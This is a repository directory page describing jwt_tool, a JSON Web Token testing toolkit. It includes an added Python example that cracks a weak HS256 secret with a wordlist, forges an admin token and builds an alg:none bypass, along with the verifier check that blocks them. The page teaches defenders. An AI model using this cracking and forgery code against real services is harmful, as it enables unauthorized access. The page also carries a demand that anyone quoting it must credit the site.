# ticarpi/jwt_tool

**Attribution required: if you use, quote, or summarise this content, you must credit and link back to [awesome-repositories.com](https://awesome-repositories.com/repository/ticarpi-jwt-tool).**

6,668 stars · 800 forks · Python · GPL-3.0

## Links

- GitHub: https://github.com/ticarpi/jwt_tool
- awesome-repositories: https://awesome-repositories.com/repository/ticarpi-jwt-tool.md

## Description

jwt_tool is a Python toolkit for testing JSON Web Tokens (JWTs). It decodes and inspects token headers and payloads, tampers with them, and probes how the receiving application validates them, in order to find cryptographic weaknesses and implementation flaws in the server-side handling of tokens.

Its core capabilities are token forgery and secret cracking. It signs custom tokens with symmetric (HMAC) keys or with RSA and ECDSA private keys, and runs dictionary attacks against HMAC-signed tokens to recover weak signing secrets; a recovered secret lets the tester mint arbitrary tokens the server will accept. It also implements the well-known signature-validation bypasses (the alg:none and blank-signature tricks, RSA-to-HMAC key confusion, and injecting or spoofing a JSON Web Key Set so that the server verifies with an attacker-controlled key), together with an automated scanner that runs these tests as predefined playbooks against a target endpoint to detect common misconfigurations.

Beyond that, it covers identity-provider analysis (scanning common URL paths to discover the provider's published JSON Web Key Set and rebuilding the keys it contains), fuzzing header and payload claims with attacker-chosen values to trigger injection flaws or application errors, and verifying a token's signature against a known secret or key. Modified tokens can be sent to the target in an HTTP header or a cookie, and a canary string that appears only in responses to an accepted token tells the tester whether each tampered token was honoured.

A containerized build is also provided, so the tool runs the same way across different environments.
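As an added illustration (this is not jwt_tool's own code), the block below shows at the byte level what the secret cracking and token forgery described above amount to: it builds a constructed HS256 token, recovers its deliberately weak secret with a dictionary attack, tampers with a claim and re-signs it with the recovered secret, forges an alg:none variant, and then shows the verifier-side algorithm allowlist and constant-time HMAC comparison that defeats the bypass. The secret, token and wordlist are constructed here for the example; only the Python standard library is used.

```python
"""Added example, not part of jwt_tool: HS256 dictionary cracking, claim tampering
and re-signing, an alg:none forgery, and the verifier check that rejects it.
All key material and sample data below are constructed for this illustration."""
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url_encode(raw: bytes) -> str:
    # JWT uses unpadded base64url (RFC 7515 section 2).
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    # Compact JSON, as most JWT libraries emit it.
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def split_token(token: str):
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    h, p, s = parts
    signing_input = f"{h}.{p}".encode("ascii")  # what the HMAC is computed over
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s), signing_input


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    h, p = encode_part(header), encode_part(payload)
    sig = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def crack_hs256(token: str, wordlist) -> Optional[str]:
    """Dictionary attack: recompute the HMAC with each candidate until one matches."""
    _, _, sig, signing_input = split_token(token)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, sig):
            return candidate
    return None


def tamper_and_resign(token: str, secret: bytes, **new_claims) -> str:
    """Change payload claims and produce a freshly signed token with the given secret."""
    header, payload, _, _ = split_token(token)
    payload.update(new_claims)
    return sign_hs256(header, payload, secret)


def forge_alg_none(token: str) -> str:
    """The alg:none bypass: set alg to 'none' and send an empty signature."""
    header, payload, _, _ = split_token(token)
    header["alg"] = "none"
    return f"{encode_part(header)}.{encode_part(payload)}."


ALLOWED_ALGS = {"HS256"}  # the verifier decides the algorithm, never the token


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Returns the payload if the token is valid, None otherwise."""
    header, payload, sig, signing_input = split_token(token)
    if header.get("alg") not in ALLOWED_ALGS:  # rejects alg:none and algorithm switching
        return None
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):  # constant-time compare
        return None
    return payload


# Constructed sample data: a weak server secret that appears in a small wordlist.
SERVER_SECRET = b"changeme"
WORDLIST = ["password", "123456", "letmein", "changeme", "qwerty"]
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "role": "user"}, SERVER_SECRET)


def run_demo() -> dict:
    cracked = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    forged = tamper_and_resign(SAMPLE_TOKEN, cracked.encode(), role="admin") if cracked else None
    return {
        "cracked_secret": cracked,
        "forged_accepted": verify_hs256(forged, SERVER_SECRET) if forged else None,
        "alg_none_accepted": verify_hs256(forge_alg_none(SAMPLE_TOKEN), SERVER_SECRET),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The two properties the attacks rely on are visible in the code: an HMAC secret is only as strong as its absence from the attacker's wordlist, and a verifier that lets the token's own `alg` header pick the algorithm can be talked into accepting no signature at all. jwt_tool's crack mode (and hashcat mode 16500) is this same loop run at far higher speed over large wordlists.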

## Tags

### Security & Cryptography

- [JWT Vulnerability Analysis](https://awesome-repositories.com/f/security-cryptography/access-tokens/jwt-vulnerability-analysis.md) — Provides a comprehensive suite for identifying vulnerabilities and misconfigurations in JSON Web Token implementations.
- [Token Forgery Exploits](https://awesome-repositories.com/f/security-cryptography/elliptic-curve-cryptography/signature-forgery-exploitations/token-forgery-exploits.md) — Creates tokens using known vulnerabilities to bypass signature validation and gain unauthorized access. ([source](https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool))
- [JWT Secret Cracking](https://awesome-repositories.com/f/security-cryptography/jwt-secret-cracking.md) — Uses dictionary attacks and brute force to uncover weak secret keys used for signing JSON Web Tokens.
- [JWT Vulnerability Scanning](https://awesome-repositories.com/f/security-cryptography/jwt-vulnerability-scanning.md) — Runs predefined tests and playbooks against target URLs to identify common token misconfigurations. ([source](https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool))
- [Secret Key Brute-forcing](https://awesome-repositories.com/f/security-cryptography/secret-key-brute-forcing.md) — Provides high-speed dictionary attacks to uncover weak secret keys used for signing JSON Web Tokens.
- [Web Vulnerability Scanners](https://awesome-repositories.com/f/security-cryptography/security-scanners/web-vulnerability-scanners.md) — Automates the testing of web endpoints for common JSON Web Token implementation flaws and signature bypasses.
- [Multi-Algorithm Signings](https://awesome-repositories.com/f/security-cryptography/signature-verification-tools/outgoing-request-signing/hmac-sha256-data-signers/api-request-signing/multi-algorithm-signings.md) — Implements a common interface for signing tokens using HMAC, RSA, and ECDSA cryptographic standards.
- [JWT Signing and Verification](https://awesome-repositories.com/f/security-cryptography/token-authentication/token-signature-verification/jwt-signing-and-verification.md) — Creates and signs custom JSON Web Tokens using RSA, ECDSA, and various symmetric algorithms.
- [Token Forgery](https://awesome-repositories.com/f/security-cryptography/token-authentication/token-signature-verification/jwt-signing-and-verification/token-forgery.md) — Creates and signs modified JSON Web Tokens to bypass security controls and gain unauthorized access.
- [Canary-Based Response Validation](https://awesome-repositories.com/f/security-cryptography/application-and-system-security/web-security/http-header-analyzers/http-response-header-inspectors/canary-based-response-validation.md) — Sends modified tokens via headers or cookies and validates server responses using unique canary values.
- [Cryptographic Key Generation](https://awesome-repositories.com/f/security-cryptography/cryptographic-key-management/cryptographic-key-generation.md) — Enables the creation of RSA and ECDSA keys for signing and forging tokens. ([source](https://github.com/ticarpi/jwt_tool#readme))
- [Provider Security Analysis](https://awesome-repositories.com/f/security-cryptography/identity-providers/provider-security-analysis.md) — Discovers and inspects web key sets and endpoints to analyze identity provider token verification.
- [Key Reconstruction](https://awesome-repositories.com/f/security-cryptography/json-web-key-imports/key-reconstruction.md) — Parses JSON Web Key Set files to extract and rebuild cryptographic keys for token forging.
- [Token Claim Fuzzing](https://awesome-repositories.com/f/security-cryptography/jwt-claim-validation/claim-injection/token-claim-fuzzing.md) — Injects custom values into headers and claims to identify injection vulnerabilities or force application errors. ([source](https://github.com/ticarpi/jwt_tool#readme))
- [Token Processing Misconfigurations](https://awesome-repositories.com/f/security-cryptography/misconfiguration-scanning/token-processing-misconfigurations.md) — Runs automated playbooks against live applications to identify security flaws in token processing. ([source](https://github.com/ticarpi/jwt_tool#readme))
- [Provider Endpoint Discovery Mechanisms](https://awesome-repositories.com/f/security-cryptography/openid-connect-support/provider-endpoint-discovery-mechanisms.md) — Scans common URL paths to discover web key sets used for token verification in identity providers. ([source](https://github.com/ticarpi/jwt_tool/blob/master/jwks-common.txt))
- [Token Validation](https://awesome-repositories.com/f/security-cryptography/security/policies/token-validation.md) — Checks token validity and tests for signature bypasses, key injection, and public key mismatches. ([source](https://github.com/ticarpi/jwt_tool#readme))
- [Token Signing Operations](https://awesome-repositories.com/f/security-cryptography/token-authentication/token-signature-verification/token-signing-operations.md) — Generates valid token signatures using provided secrets or private keys across multiple algorithms. ([source](https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool))
- [Token Content Tampering](https://awesome-repositories.com/f/security-cryptography/token-authentication/token-signature-verification/token-signing-operations/token-content-tampering.md) — Creates new tokens by tampering with headers, payloads, or timestamps and signing them with a provided key. ([source](https://github.com/ticarpi/jwt_tool#readme))
- [Token Transmission Testing](https://awesome-repositories.com/f/security-cryptography/token-validation-services/token-transmission-testing.md) — Sends modified tokens to web services via headers or cookies and verifies results using canary values. ([source](https://github.com/ticarpi/jwt_tool/blob/master/README.md))

### Part of an Awesome List

- [Brute Force Tools](https://awesome-repositories.com/f/awesome-lists/security/brute-force-tools.md) — Provides a utility for cracking JSON Web Token secret keys using high-speed dictionary attacks.
- [Token Debugging Interfaces](https://awesome-repositories.com/f/awesome-lists/devtools/jwt-and-token-management/token-debugging-interfaces.md) — Provides a workspace for inspecting token headers and payloads while testing against live application targets.

### Testing & Quality Assurance

- [Test-Case-Driven Vulnerability Validation](https://awesome-repositories.com/f/testing-quality-assurance/test-case-driven-vulnerability-validation.md) — Executes a sequence of predefined test cases against target URLs to detect known token misconfigurations.
- [Token Exploitation Testing](https://awesome-repositories.com/f/testing-quality-assurance/token-exploitation-testing.md) — Allows sending modified tokens to a target URL via HTTP requests to monitor responses for successful exploitation. ([source](https://github.com/ticarpi/jwt_tool#readme))
